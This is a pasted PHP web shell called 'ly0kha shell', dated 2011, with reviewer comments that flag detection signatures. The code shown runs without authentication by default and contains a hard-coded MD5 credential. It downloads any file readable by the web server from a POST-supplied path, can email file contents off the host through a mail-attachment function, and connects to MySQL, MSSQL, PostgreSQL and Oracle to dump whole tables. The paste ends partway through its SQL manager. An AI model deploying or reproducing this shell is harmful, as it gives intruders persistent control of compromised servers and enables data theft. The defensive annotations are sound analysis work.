
Untitled

a guest Oct 29th, 2011 15,269 Never
  1. <??><?php
  2. /******************************************************************************************************/
  3. /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~*/
  4. /*  (c)oded by SnIpEr_SA,Developed by Ly0kha
  5. /*  MAIL http://vnbrain.net , http://vnhack.net
  6. /******************************************************************************************************/
  7. /* ~~~  | Options  ~~~ */
  // Operator-editable settings of this web shell: the UI language, whether the HTTP Basic
  // auth gate is enabled, and the two MD5 digests that gate compares against.
  8. // ~~~~| Language
  9. // $language='eng' - english (english)
  10. // $language='ar' - arabi (arabi)
  11. $language='eng';
  12. // ~~~~~~~ | Authentification
  13. // $auth = 1; -( authentification = On  )
  14. // $auth = 0; -  ( authentification = Off )
  // As pasted, authentication is off: the `if($auth == 1)` check later in the file is skipped,
  // so anyone who can reach the script's URL gets the full interface.
  15. $auth = 0;
  16. // (Login & Password for access)
  17. //(CHANGE THIS!!!)
  18. //   'ly0kha'
  19. // user and pass are stored as MD5 hashes
  // Both settings hold the same digest, so login and password are the same value. The auth
  // check applies a plain md5() to the submitted credentials (no salt).
  // NOTE(review): the comment above suggests the plaintext is 'ly0kha' — not verified here.
  // The literal digest is a stable string to search for when hunting copies of this file.
  20. $name='0963b32c662bde64ababb0bee7825fc3'; //(user login)
  21. $pass='0963b32c662bde64ababb0bee7825fc3'; // (user password)
  22. /******************************************************************************************************/
  23.  
  // Request bootstrap: silences PHP diagnostics, lifts the execution time limit, normalises
  // request arrays for very old PHP versions and (optionally) enforces HTTP Basic auth.
  // $copy is not assigned anywhere in the visible code, so this echo prints an empty string.
  24. echo "".htmlspecialchars($copy)."";
  // All error reporting is turned off, so the script's own failures do not surface as PHP
  // errors — do not rely on PHP error logs alone to spot its activity.
  25. error_reporting(0);
  // Legacy (PHP 4/5 era) magic-quotes API.
  26. set_magic_quotes_runtime(0);
  // Removes the execution time limit and disables output buffering; failures are hidden by @.
  27. @set_time_limit(0);
  28. @ini_set('max_execution_time',0);
  29. @ini_set('output_buffering',0);
  30. $safe_mode = @ini_get('safe_mode');
  31. $version = '1.31';
  // Compatibility shim for PHP older than 4.1.0: alias the superglobals to the old $HTTP_*_VARS.
  32. if(version_compare(phpversion(), '4.1.0') == -1)
  33.  {
  34.  $_POST   = &$HTTP_POST_VARS;
  35.  $_GET    = &$HTTP_GET_VARS;
  36.  $_SERVER = &$HTTP_SERVER_VARS;
  37.  $_COOKIE = &$HTTP_COOKIE_VARS;
  38.  }
  // When magic quotes are active, undo the automatic escaping on POST and COOKIE values so the
  // script receives the raw bytes the client sent ($_GET is not touched here).
  39. if (@get_magic_quotes_gpc())
  40.  {
  41.  foreach ($_POST as $k=>$v)
  42.   {
  43.   $_POST[$k] = stripslashes($v);
  44.   }
  45.  foreach ($_COOKIE as $k=>$v)
  46.   {
  47.   $_COOKIE[$k] = stripslashes($v);
  48.   }
  49.  }
  50.  
  // Optional HTTP Basic auth gate, active only when $auth == 1. The MD5 of the submitted user
  // name and password must equal $name and $pass; otherwise a 401 challenge is sent and the
  // script exits. The realm "ly0kha shell" and the "Access Denied" body are fixed strings, so
  // they can serve as signatures in HTTP response inspection or file-content scanning.
  51. if($auth == 1) {
  52. if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
  53.    {
  54.    header('WWW-Authenticate: Basic realm="ly0kha shell"');
  55.    header('HTTP/1.0 401 Unauthorized');
  56.    exit("<b><a href=http://vnbrain.net>ly0kha</a> : Access Denied</b>");
  57.    }
  58. }
  59. $head = '<!--  ly0kha  -->
  60. <html>
  61. <head>
  62. <meta http-equiv="Content-Language" content="ar-sa">
  63. <meta name="GENERATOR" content="Microsoft FrontPage 6.0">
  64. <meta name="ProgId" content="FrontPage.Editor.Document">
  65. <meta http-equiv="Content-Type" content="text/html; charset=windows-1256">
  66. <title>ly0kha shell</title>
  67.  
  68.  
  69.  
  70. <STYLE>
  71.  
  72. BODY
  73. {
  74.        SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; COLOR: #ffffff; SCROLLBAR-3DLIGHT-COLOR: #726456; SCROLLBAR-ARROW-COLOR: #726456; SCROLLBAR-TRACK-COLOR: #292929; FONT-FAMILY: Verdana; SCROLLBAR-DARKSHADOW-COLOR: #726456
  75. }
  76.  
  77. tr {
  78. BORDER-RIGHT:  #cccccc 1px solid;
  79. BORDER-TOP:    #cccccc 1px solid;
  80. BORDER-LEFT:   #cccccc 1px solid;
  81. BORDER-BOTTOM: #cccccc 1px solid;
  82. color: #ffffff;
  83. }
  84. td {
  85. BORDER-RIGHT:  #cccccc 1px solid;
  86. BORDER-TOP:    #cccccc 1px solid;
  87. BORDER-LEFT:   #cccccc 1px solid;
  88. BORDER-BOTTOM: #cccccc 1px solid;
  89. color: #cccccc;
  90. }
  91. .table1 {
  92. BORDER: 1;
  93. BACKGROUND-COLOR: #000000;
  94. color: #333333;
  95. }
  96. .td1 {
  97. BORDER: 1;
  98. font: 7pt tahoma;
  99. color: #ffffff;
  100. }
  101. .tr1 {
  102. BORDER: 1;
  103. color: #cccccc;
  104. }
  105. table {
  106. BORDER:  #eeeeee  outset;
  107. BACKGROUND-COLOR: #000000;
  108. color: #cccccc;
  109. }
  110. input {
  111. BORDER-RIGHT:  #990000 1px solid;
  112. BORDER-TOP:    #990000 1px solid;
  113. BORDER-LEFT:   #990000 1px solid;
  114. BORDER-BOTTOM: #990000 1px solid;
  115. BACKGROUND-COLOR: #333333;
  116. font: 9pt tahoma;
  117. color: #ffffff;
  118. }
  119. select {
  120. BORDER-RIGHT:  #ffffff 1px solid;
  121. BORDER-TOP:    #999999 1px solid;
  122. BORDER-LEFT:   #999999 1px solid;
  123. BORDER-BOTTOM: #ffffff 1px solid;
  124. BACKGROUND-COLOR: #000000;
  125. font: 9pt tahoma;
  126. color: #CCCCCC;;
  127. }
  128. submit {
  129. BORDER:  buttonhighlight 1 outset;
  130. BACKGROUND-COLOR: #272727;
  131. width: 40%;
  132. color: #cccccc;
  133. }
  134. textarea {
  135. BORDER-RIGHT:  #ffffff 1px solid;
  136. BORDER-TOP:    #999999 1px solid;
  137. BORDER-LEFT:   #999999 1px solid;
  138. BORDER-BOTTOM: #ffffff 1px solid;
  139. BACKGROUND-COLOR: #333333;
  140. font: Fixedsys bold;
  141. color: #ffffff;
  142. }
  143. BODY {
  144. margin: 1;
  145. color: #cccccc;
  146. background-color: #000000;
  147. }
  148. A:link {COLOR:red; TEXT-DECORATION: none}
  149. A:visited { COLOR:red; TEXT-DECORATION: none}
  150. A:active {COLOR:red; TEXT-DECORATION: none}
  151. A:hover {color:blue;TEXT-DECORATION: none}
  152.  
  153. </STYLE>
  154. <script language=\'javascript\'>
  155. function hide_div(id)
  156. {
  157.  document.getElementById(id).style.display = \'none\';
  158.  document.cookie=id+\'=0;\';
  159. }
  160. function show_div(id)
  161. {
  162.  document.getElementById(id).style.display = \'block\';
  163.  document.cookie=id+\'=1;\';
  164. }
  165. function change_divst(id)
  166. {
  167.  if (document.getElementById(id).style.display == \'none\')
  168.    show_div(id);
  169.  else
  170.    hide_div(id);
  171. }
  172. </script>';
  // In-memory ZIP archive builder. addFile() appends one compressed entry (local file header
  // plus data) to $datasec and the matching central-directory record to $ctrl_dir; file()
  // joins both with an end-of-central-directory record and returns the archive as a string.
  173. class zipfile
  174. {
  // $datasec: local header + data per entry; $ctrl_dir: central-directory record per entry;
  // $eof_ctrl_dir: fixed start of the end-of-central-directory record;
  // $old_offset: byte offset at which the next entry's local header will start.
  175.     var $datasec      = array();
  176.     var $ctrl_dir     = array();
  177.     var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
  178.     var $old_offset   = 0;
  // Packs a Unix timestamp (current time when 0) into one integer: year-1980, month, day,
  // hours, minutes and seconds/2 in descending bit positions. Dates before 1980 are clamped
  // to 1980-01-01 00:00:00.
  179.     function unix2DosTime($unixtime = 0) {
  180.         $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
  181.         if ($timearray['year'] < 1980) {
  182.             $timearray['year']    = 1980;
  183.             $timearray['mon']     = 1;
  184.             $timearray['mday']    = 1;
  185.             $timearray['hours']   = 0;
  186.             $timearray['minutes'] = 0;
  187.             $timearray['seconds'] = 0;
  188.         }
  189.         return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
  190.                 ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
  191.     }
  // Adds one entry to the archive.
  //   $data - file contents, $name - entry path (backslashes become '/'),
  //   $time - Unix timestamp for the entry, 0 meaning "now".
  192.     function addFile($data, $name, $time = 0)
  193.     {
  194.         $name     = str_replace('\\', '/', $name);
  195.         $dtime    = dechex($this->unix2DosTime($time));
  // Re-orders the hex digits pairwise, last pair first, as '\xNN' escape text.
  196.         $hexdtime = '\x' . $dtime[6] . $dtime[7]
  197.                   . '\x' . $dtime[4] . $dtime[5]
  198.                   . '\x' . $dtime[2] . $dtime[3]
  199.                   . '\x' . $dtime[0] . $dtime[1];
  // REVIEW: eval() turns that escape text into four raw bytes. The evaluated string is built
  // only from dechex() output, not from $data or $name, but any eval( in a PHP file is worth
  // flagging during triage of a suspicious upload.
  200.         eval('$hexdtime = "' . $hexdtime . '";');
  // Local file header: "PK\x03\x04" signature, three fixed 2-byte fields, then the timestamp.
  201.         $fr   = "\x50\x4b\x03\x04";
  202.         $fr   .= "\x14\x00";
  203.         $fr   .= "\x00\x00";
  204.         $fr   .= "\x08\x00";
  205.         $fr   .= $hexdtime;
  206.         $unc_len = strlen($data);
  207.         $crc     = crc32($data);
  208.         $zdata   = gzcompress($data);
  // Drop the first 2 and last 4 bytes of the gzcompress() output, keeping the middle part.
  209.         $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
  210.         $c_len   = strlen($zdata);
  211.         $fr      .= pack('V', $crc);
  212.         $fr      .= pack('V', $c_len);
  213.         $fr      .= pack('V', $unc_len);
  214.         $fr      .= pack('v', strlen($name));
  215.         $fr      .= pack('v', 0);
  216.         $fr      .= $name;
  217.         $fr .= $zdata;
  218.         $this -> datasec[] = $fr;
  // Central-directory record for the same entry ("PK\x01\x02" signature); it repeats the
  // CRC, sizes and name and stores the offset of the local header written above.
  219.         $cdrec = "\x50\x4b\x01\x02";
  220.         $cdrec .= "\x00\x00";
  221.         $cdrec .= "\x14\x00";
  222.         $cdrec .= "\x00\x00";
  223.         $cdrec .= "\x08\x00";
  224.         $cdrec .= $hexdtime;
  225.         $cdrec .= pack('V', $crc);
  226.         $cdrec .= pack('V', $c_len);
  227.         $cdrec .= pack('V', $unc_len);
  228.         $cdrec .= pack('v', strlen($name) );
  229.         $cdrec .= pack('v', 0 );
  230.         $cdrec .= pack('v', 0 );
  231.         $cdrec .= pack('v', 0 );
  232.         $cdrec .= pack('v', 0 );
  233.         $cdrec .= pack('V', 32 );
  234.         $cdrec .= pack('V', $this -> old_offset );
  235.         $this -> old_offset += strlen($fr);
  236.         $cdrec .= $name;
  237.         $this -> ctrl_dir[] = $cdrec;
  238.     }
  // Returns the finished archive: all entries, all central-directory records, then the
  // end-of-central-directory record carrying the entry count (twice), the size of the
  // central directory and the size of the entry data, followed by two zero bytes.
  239.     function file()
  240.     {
  241.         $data    = implode('', $this -> datasec);
  242.         $ctrldir = implode('', $this -> ctrl_dir);
  243.         return
  244.             $data .
  245.             $ctrldir .
  246.             $this -> eof_ctrl_dir .
  247.             pack('v', sizeof($this -> ctrl_dir)) .
  248.             pack('v', sizeof($this -> ctrl_dir)) .
  249.             pack('V', strlen($ctrldir)) .
  250.             pack('V', strlen($data)) .
  251.             "\x00\x00";
  252.     }
  253. }
  // Compresses a download in place. $filename and $filedump are passed by reference and are
  // rewritten; the globals $mime_type and (gzip only) $content_encoding are set for the
  // caller to emit as response headers. $compress selects 'bzip', 'gzip' or 'zip'; any other
  // value, or a missing compression function, leaves the data untouched and sets a generic
  // binary MIME type.
  254. function compress(&$filename,&$filedump,$compress)
  255.  {
  256.     global $content_encoding;
  257.     global $mime_type;
  258.     if ($compress == 'bzip' && @function_exists('bzcompress'))
  259.      {
  260.         $filename  .= '.bz2';
  261.         $mime_type = 'application/x-bzip2';
  262.         $filedump = bzcompress($filedump);
  263.      }
  264.      else if ($compress == 'gzip' && @function_exists('gzencode'))
  265.      {
  266.         $filename  .= '.gz';
  267.         $content_encoding = 'x-gzip';
  268.         $mime_type = 'application/x-gzip';
  269.         $filedump = gzencode($filedump);
  270.      }
  271.      else if ($compress == 'zip' && @function_exists('gzcompress'))
  272.      {
  273.              $filename .= '.zip';
  274.         $mime_type = 'application/zip';
  275.         $zipfile = new zipfile();
  // The entry inside the archive keeps the original name: the '.zip' just appended is cut off.
  276.         $zipfile -> addFile($filedump, substr($filename, 0, -4));
  277.         $filedump = $zipfile -> file();
  278.      }
  279.      else
  280.      {
  281.              $mime_type = 'application/octet-stream';
  282.      }
  283.  }
  // Sends one file by e-mail through PHP's mail(). $attach is an array with the keys 'type',
  // 'name' and 'content'. The base64-encoded content is appended to the header string and the
  // message body is empty. Returns 1 when mail() reports success, 0 otherwise.
  // REVIEW (defender): this gives the script a way to move file contents off the host by
  // mail; callers are outside this part of the file. $from, $attach['type'] and
  // $attach['name'] are placed into the headers without any CR/LF filtering. Outbound mail
  // originating from the web server's PHP process is a signal worth monitoring.
  284. function mailattach($to,$from,$subj,$attach)
  285.  {
  286.  $headers  = "From: $from\r\n";
  287.  $headers .= "MIME-Version: 1.0\r\n";
  288.  $headers .= "Content-Type: ".$attach['type'];
  289.  $headers .= "; name=\"".$attach['name']."\"\r\n";
  290.  $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
  291.  $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
  292.  if(@mail($to,$subj,"",$headers)) { return 1; }
  293.  return 0;
  294.  }
  // Database client used by the shell. One object wraps the legacy mysql_*, mssql_*, pg_* and
  // oci* extension functions; $db ('MySQL', 'MSSQL', 'PostgreSQL' or 'Oracle') selects the
  // driver in every method. Almost every driver call is prefixed with @, so driver warnings
  // are suppressed. Connection settings are plain properties filled in by code outside this class.
  295. class my_sql
  296.  {
  297.  var $host = 'localhost';
  298.  var $port = '';
  299.  var $user = '';
  300.  var $pass = '';
  301.  var $base = '';
  302.  var $db   = '';
  303.  var $connection;
  304.  var $res;
  305.  var $error;
  306.  var $rows;
  307.  var $columns;
  308.  var $num_rows;
  309.  var $num_fields;
  310.  var $dump;
  311.  
  // Opens a connection with the configured driver and stores it in $connection.
  // Returns 1 on success; 0 when the driver function is missing, the connection fails or
  // $db is not one of the four known names. Empty ports default to 3306 / 1433 / 5432.
  312.  function connect()
  313.   {
  314.           switch($this->db)
  315.      {
  316.            case 'MySQL':
  317.             if(empty($this->port)) { $this->port = '3306'; }
  318.             if(!function_exists('mysql_connect')) return 0;
  319.             $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
  320.             if(is_resource($this->connection)) return 1;
  321.            break;
  322.      case 'MSSQL':
  323.       if(empty($this->port)) { $this->port = '1433'; }
  324.             if(!function_exists('mssql_connect')) return 0;
  325.             $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
  326.       if($this->connection) return 1;
  327.      break;
  328.      case 'PostgreSQL':
  329.       if(empty($this->port)) { $this->port = '5432'; }
  // The connection string is built by concatenation; the values are wrapped in single quotes
  // but not escaped.
  330.       $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
  331.       if(!function_exists('pg_connect')) return 0;
  332.       $this->connection = @pg_connect($str);
  333.       if(is_resource($this->connection)) return 1;
  334.      break;
  335.      case 'Oracle':
  336.       if(!function_exists('ocilogon')) return 0;
  337.       $this->connection = @ocilogon($this->user, $this->pass, $this->base);
  338.       if(is_resource($this->connection)) return 1;
  339.      break;
  340.      }
  341.     return 0;
  342.   }
  343.  
  // Selects database $base on the open connection (MySQL and MSSQL). For PostgreSQL and
  // Oracle it returns 1 without doing anything. Returns 0 on failure or unknown driver.
  344.  function select_db()
  345.   {
  346.    switch($this->db)
  347.     {
  348.           case 'MySQL':
  349.            if(@mysql_select_db($this->base,$this->connection)) return 1;
  350.     break;
  351.     case 'MSSQL':
  352.            if(@mssql_select_db($this->base,$this->connection)) return 1;
  353.     break;
  354.     case 'PostgreSQL':
  355.      return 1;
  356.     break;
  357.     case 'Oracle':
  358.      return 1;
  359.     break;
  360.     }
  361.    return 0;
  362.   }
  363.  
  // Runs $query as given (no parameter binding) and stores the driver result in $res.
  // Returns 0 on failure (with $error set), otherwise 1 or 2:
  //   MySQL            - 1 when the result is a resource, else 2
  //   MSSQL/PostgreSQL - 1 when the result has more than zero rows, else 2
  //   Oracle           - 2 when ocirowcount() is non-zero, else 1
  364.  function query($query)
  365.   {
  366.    $this->res=$this->error='';
  367.    switch($this->db)
  368.     {
  369.           case 'MySQL':
  // Every MySQL statement is sent with a leading SQL comment that contains a NUL byte.
  // NOTE(review): the reason is not visible in this file; for defenders the constant prefix
  // is something to look for in query logs or database audit trails.
  370.      if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
  371.       {
  372.       $this->error = @mysql_error($this->connection);
  373.       return 0;
  374.       }
  375.      else if(is_resource($this->res)) { return 1; }
  376.      return 2;
  377.           break;
  378.     case 'MSSQL':
  379.      if(false===($this->res=@mssql_query($query,$this->connection)))
  380.       {
  381.       $this->error = 'Query error';
  382.       return 0;
  383.       }
  384.       else if(@mssql_num_rows($this->res) > 0) { return 1; }
  385.      return 2;
  386.     break;
  387.     case 'PostgreSQL':
  388.      if(false===($this->res=@pg_query($this->connection,$query)))
  389.       {
  390.       $this->error = @pg_last_error($this->connection);
  391.       return 0;
  392.       }
  393.       else if(@pg_num_rows($this->res) > 0) { return 1; }
  394.      return 2;
  395.     break;
  396.     case 'Oracle':
  397.      if(false===($this->res=@ociparse($this->connection,$query)))
  398.       {
  399.       $this->error = 'Query parse error';
  400.       }
  401.      else
  402.       {
  403.       if(@ociexecute($this->res))
  404.        {
  405.        if(@ocirowcount($this->res) != 0) return 2;
  406.        return 1;
  407.        }
  408.       $error = @ocierror();
  409.       $this->error=$error['message'];
  410.       }
  411.     break;
  412.     }
  413.   return 0;
  414.   }
  // Fetches the whole result of the last query() into $rows (associative arrays), sets
  // $num_rows / $num_fields, frees the driver result and, when there is at least one row,
  // fills $columns from the keys of the first row. Returns 1 when rows were found, else 0.
  // Each fetch loop assigns before it tests, so the terminating false is also appended as
  // the last element of $rows.
  415.  function get_result()
  416.   {
  417.    $this->rows=array();
  418.    $this->columns=array();
  419.    $this->num_rows=$this->num_fields=0;
  420.    switch($this->db)
  421.     {
  422.           case 'MySQL':
  423.            $this->num_rows=@mysql_num_rows($this->res);
  424.            $this->num_fields=@mysql_num_fields($this->res);
  425.            while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
  426.            @mysql_free_result($this->res);
  427.            if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
  428.     break;
  429.     case 'MSSQL':
  430.            $this->num_rows=@mssql_num_rows($this->res);
  431.            $this->num_fields=@mssql_num_fields($this->res);
  432.            while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
  433.            @mssql_free_result($this->res);
  434.            if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
  435.     break;
  436.     case 'PostgreSQL':
  437.            $this->num_rows=@pg_num_rows($this->res);
  438.            $this->num_fields=@pg_num_fields($this->res);
  439.            while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
  440.            @pg_free_result($this->res);
  441.            if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
  442.     break;
  443.     case 'Oracle':
  444.      $this->num_fields=@ocinumcols($this->res);
  // Oracle has no row-count call here; rows are counted while they are fetched.
  445.      while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
  446.      @ocifreestatement($this->res);
  447.      if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
  448.     break;
  449.     }
  450.    return 0;
  451.   }
  // Builds a text dump of one table into $dump (an array of lines): a '##' comment header
  // with date, database and table, then one INSERT statement per row. For MySQL the
  // SHOW CREATE TABLE output is included as well. Returns 1 on success, 0 when $table is
  // empty, a query fails, the table has no rows or the driver is unknown.
  // REVIEW (defender): this is the bulk data-export path of the shell — a full
  // 'SELECT * FROM <table>' per dumped table. $table is concatenated into the statements
  // without escaping or validation.
  452.  function dump($table)
  453.   {
  454.    if(empty($table)) return 0;
  455.    $this->dump=array();
  456.    $this->dump[0] = '##';
  457.    $this->dump[1] = '## --------------------------------------- ';
  458.    $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");
  459.    $this->dump[3] = '## Database: '.$this->base;
  460.    $this->dump[4] = '##    Table: '.$table;
  461.    $this->dump[5] = '## --------------------------------------- ';
  462.    switch($this->db)
  463.     {
  464.           case 'MySQL':
  465.            $this->dump[0] = '## MySQL dump';
  // query() adds its own NUL-comment prefix for MySQL, so these statements carry it twice.
  466.            if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
  467.            if(!$this->get_result()) return 0;
  468.            $this->dump[] = $this->rows[0]['Create Table'];
  469.      $this->dump[] = '## --------------------------------------- ';
  470.            if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
  471.            if(!$this->get_result()) return 0;
  472.            for($i=0;$i<$this->num_rows;$i++)
  473.             {
  474.       foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
  475.             $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
  476.             }
  477.     break;
  478.     case 'MSSQL':
  479.      $this->dump[0] = '## MSSQL dump';
  480.      if($this->query('SELECT * FROM '.$table)!=1) return 0;
  481.            if(!$this->get_result()) return 0;
  482.            for($i=0;$i<$this->num_rows;$i++)
  483.             {
  484.       foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
  485.             $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
  486.             }
  487.     break;
  488.     case 'PostgreSQL':
  489.      $this->dump[0] = '## PostgreSQL dump';
  490.      if($this->query('SELECT * FROM '.$table)!=1) return 0;
  491.            if(!$this->get_result()) return 0;
  492.            for($i=0;$i<$this->num_rows;$i++)
  493.             {
  494.       foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
  495.             $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
  496.             }
  497.     break;
  498.     case 'Oracle':
  // No Oracle dump is implemented; only a placeholder line is written.
  499.       $this->dump[0] = '## ORACLE dump';
  500.       $this->dump[]  = '## under construction';
  501.     break;
  502.     default:
  503.      return 0;
  504.     break;
  505.     }
  506.    return 1;
  507.   }
  // Closes $connection with the driver-specific close call; returns nothing.
  508.  function close()
  509.   {
  510.    switch($this->db)
  511.     {
  512.           case 'MySQL':
  513.            @mysql_close($this->connection);
  514.     break;
  515.     case 'MSSQL':
  516.      @mssql_close($this->connection);
  517.     break;
  518.     case 'PostgreSQL':
  519.      @pg_close($this->connection);
  520.     break;
  521.     case 'Oracle':
  522.      @oci_close($this->connection);
  523.     break;
  524.     }
  525.   }
  // Returns what the driver's affected-rows call reports when given $res; 0 for an unknown driver.
  526.  function affected_rows()
  527.   {
  528.    switch($this->db)
  529.     {
  530.           case 'MySQL':
  531.            return @mysql_affected_rows($this->res);
  532.     break;
  533.     case 'MSSQL':
  534.      return @mssql_affected_rows($this->res);
  535.     break;
  536.     case 'PostgreSQL':
  537.      return @pg_affected_rows($this->res);
  538.     break;
  539.     case 'Oracle':
  540.      return @ocirowcount($this->res);
  541.     break;
  542.     default:
  543.      return 0;
  544.     break;
  545.     }
  546.   }
  547.  }
  // File-download handler. When the request carries POST cmd=download_file and a non-empty
  // d_name, the file at that path is read and returned as an attachment, optionally
  // compressed according to POST 'compress'.
  // REVIEW (defender): d_name is used as-is, with no path restriction, so any file readable
  // by the web server account can be retrieved. The POST field names cmd, d_name and
  // compress, and the 'download_file' value, are fixed strings usable in WAF rules or when
  // searching request-body captures. err() is not defined in the visible part of the file.
  548. if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
  549.  {
  550.   if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
  551.   else
  552.    {
  // Discard anything already buffered so the response body is only the file.
  553.     @ob_clean();
  554.     $filename = @basename($_POST['d_name']);
  555.     $filedump = @fread($file,@filesize($_POST['d_name']));
  556.     fclose($file);
  557.     $content_encoding=$mime_type='';
  // compress() rewrites $filename / $filedump and sets the two globals used for the headers.
  558.     compress($filename,$filedump,$_POST['compress']);
  559.     if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
  560.     header("Content-type: ".$mime_type);
  561.     header("Content-disposition: attachment; filename=\"".$filename."\";");
  562.     echo $filedump;
  563.     exit();
  564.    }
  565.  }
  566.  
  // ?phpinfo in the query string prints the full phpinfo() page (PHP configuration,
  // extensions, environment) followed by a BACK link, then stops.
  567. if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
  568. if(isset($_GET['sqlman'])) {
  569. session_start();
  570. $action = $HTTP_GET_VARS['action'];
  571. $pagemax=20; // Maximum rows displaed per page, change to display more or less rows per page.
  // Prints the login form of the built-in SQL manager: host, user name, password and, when
  // $dbnamearray is not the empty string, a drop-down with the database names in it.
  // The submitted field names are host, userid, pword1, dbna and login.
  // $action is not declared in this function's scope.
  // Database names are written into the HTML without escaping.
  572. function show_login($dbnamearray){
  573.      $hostdefault="localhost";
  574.                 echo"<table>";
  575.                 echo"<form  name='showlogin' method='post' action='$action'>";
  // $hostdefault is a plain string here; the select-list branch is written for an array of hosts.
  576.         if(count($hostdefault) > 1){
  577.             echo"<tr><td>??? C???????:</td><td><select name=host>";
  578.             for($x=0; $x < count($hostdefault);$x++){
  579.                 echo"<option value=$hostdefault[$x]>$hostdefault[$x]";
  580.             }
  581.             echo"</select></td></tr>\n";
  582.         }else{
  583.             echo"<tr><td>Server Databases:</td><td><input type=text name='host' size=15 value=$hostdefault /></td></tr>\n";
  584.                 }
  585.         echo"<tr><td>Username:</td><td><input type=text name='userid' size=15 /></td></tr>\n";
  586.                 echo"<tr><td>Password:</td><td><input type=password name='pword1' size=15 /></td></tr>\n";
  587.  
  588.                 If($dbnamearray != ""){
  589.                         echo"<tr><td>?C?IE C?E?C?CE:</td><td><select name='dbna'>\n";
  590.                         for ($i =0; $i < count($dbnamearray); $i++) {
  591.                                 $dbn=$dbnamearray[$i];
  592.                                 echo"<option value=$dbn>$dbn";
  593.                         }
  594.                 }
  595.                 echo"<tr><td><input class=ser type='submit' name='login' value='login' /></td>\n";
  596.                 echo"<td><input class=ser type=reset name='reset' value='Clear' /></td></tr>\n";
  597.                 echo"</form></table>\n";
  598.  
  599. }
  600.  
  // Returns the list of database names the logged-in session user may see. A user name
  // matching one of the hard-coded case labels gets a fixed list; every other user gets all
  // databases reported by the server for the session's MySQL credentials, and
  // $_SESSION['defaltuser'] is set to true. When $_SESSION['user'] is not set the function
  // returns nothing.
  601. function dbrestrict(){
  602. if(isset($_SESSION['user'])){
  603.     $user=$_SESSION['user'];
  604.  
  605.     switch($user){
  606.  
  607.     //Edit these ** values. You can add more case statements.
  608.         case '**User**':
  609.             $dbnamearray= array('**dbname**', '**dbname2**', '**dbname**');
  610.             break;
  611.      //end edit values
  612.  
  613.         default:
  614.             $_SESSION['defaltuser']=true;
  615.             $dbnamearray = array();
  616.             $link = connectmysql();
  617.  
  // Enumerates every database visible to the connected account.
  618.             $db_list = mysql_list_dbs($link); //$db_list
  619.                     $cnt = mysql_num_rows($db_list);
  620.                     for ($i =0; $i < $cnt; $i++) {
  621.                             $dbnamearray[$i]= mysql_db_name($db_list, $i);
  622.                     }
  623.     }
  624.     return $dbnamearray;
  625. }
  626. }
  627. //***************************************************************
  628. //function showdbs($dbnamearray, $backuppath){
  // Prints an HTML table with one row per database name in $dbnamearray: a button form
  // produced by goto() in the first cell and the value returned by mysize() in the second.
  // mysize() is not defined in the visible part of the file. $action is not declared in this
  // function's scope.
  629. function showdbs($dbnamearray){
  630.     //$backuppath=addslashes($backuppath);
  631.        echo"<table>\n";
  632.        for ($i =0; $i < count($dbnamearray); $i++) {
  633.                     echo"<tr><td>";
  634.             $dbn=$dbnamearray[$i];
  635.                         $va="Go to the base $dbn";
  636.                         goto(' ', $dbn,$action, 'but', 'db', $va );
  637.  
  638.             $dbs=mysize($dbnamearray[$i],"");
  639.             echo"</td><td>$dbs</td></tr>\n";
  640.         }
  641.     echo"</table>\n";
  642. }
  643.  
  644.  
  645. //********************* Show Logout Button **********
  // Prints the logout form: a single submit button named 'logout'. $action is not declared
  // in this function's scope.
  646. function endsess(){
  647. echo"<form method='post' name='endsess' action='$action'>\n";
  648. echo"<input class=ser type='submit' name='logout' value='Logout' />\n";
  649. echo"</form>";
